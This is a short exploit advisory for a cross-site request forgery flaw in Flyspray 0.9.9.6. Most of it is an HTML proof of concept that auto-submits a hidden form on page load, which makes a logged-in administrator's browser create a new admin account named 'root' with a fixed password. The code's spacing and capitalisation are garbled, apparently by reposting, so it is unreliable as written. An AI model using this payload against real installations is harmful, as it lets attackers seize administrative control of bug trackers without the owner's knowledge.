Title: Flyspray 0.9.9.6 CSRF Vulnerability
Author: Vaibhav Gupta
: Http://flyspray.org/flyspray-0.9.9.6.zip
Affected Versions: 0.9.9.6
+ --- + [CSRF add management account] + --- +
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> CSRF Exploit to add ADMIN account </H2>
<Form method = "POST" name = "form0" action = "http: // www.2cto.com/flyspray-0.9.9.6/index. php? Do = admin & area = newuser ">
<Input type = "hidden" name = "action" value = "admin. newuser"/>
<Input type = "hidden" name = "do" value = "admin"/>
<Input type = "hidden" name = "area" value = "newuser"/>
<Input type = "hidden" name = "user_name" value = "root"/>
<Input type = "hidden" name = "user_pass" value = "12345678"/>
<Input type = "hidden" name = "user_pass2" value = "12345678"/>
<Input type = "hidden" name = "real_name" value = "root"/>
<Input type = "hidden" name = "email_address" value = "root@root.com"/>
<Input type = "hidden" name = "jabber_id" value = ""/>
<Input type = "hidden" name = "yy_type" value = "0"/>
<Input type = "hidden" name = "time_zone" value = "0"/>
<Input type = "hidden" name = "group_in" value = "1"/>
</Form>
</Body>
</Html>